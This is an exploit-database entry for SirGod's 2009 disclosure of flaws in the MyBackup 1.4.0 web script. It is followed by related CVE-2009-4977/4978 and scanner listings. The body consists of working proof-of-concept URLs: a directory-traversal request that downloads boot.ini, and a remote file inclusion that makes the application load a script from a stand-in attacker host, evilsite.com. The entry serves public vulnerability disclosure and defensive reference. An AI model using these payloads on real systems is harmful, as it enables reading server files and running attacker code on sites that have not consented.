Lucene search
SirGodEDB-ID:9365HistoryAug 05, 2009 - 12:00 a.m.
mybackup 1.4.0 - File Download / Remote File Inclusion
2009-08-0500:00:00
SirGod
www.exploit-db.com
20
AI Score
7.4
Confidence
Low
###############################################################################################
[+] MyBackup 1.4.0 Remote File Inclusion (AFD/RFI) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
################################################################################################
[+] Download Script : http://www.tufat.com/files_lgpl/script_96.zip
[+] Arbitrary File Download
- PoC
http://127.0.0.1/down.php?filename=../../../../../../boot.ini
[+] Remote File Inclusion
- You must be logged in.
http://127.0.0.1/index.php?main_tabid=1&main_content=http://evilsite.com/evilscript.txt
################################################################################################
# milw0rm.com [2009-08-05]Related
openvas
openvas
MyBackup 1.4.0 Multiple Security Vulnerabilities
2010-08-31 00:00:00
MyBackup <= 1.4.0 Multiple Vulnerabilities
2010-08-31 00:00:00
nvd
nvd
CVE-2009-4977
2010-08-25 20:00:01
CVE-2009-4978
2010-08-25 20:00:13
cvelist
cvelist
CVE-2009-4977
2010-08-25 19:00:00
CVE-2009-4978
2010-08-25 19:00:00
cve
cve
CVE-2009-4978
2010-08-25 20:00:13
CVE-2009-4977
2010-08-25 20:00:01
prion
prion
Remote file inclusion
2010-08-25 20:00:00
Directory traversal
2010-08-25 20:00:00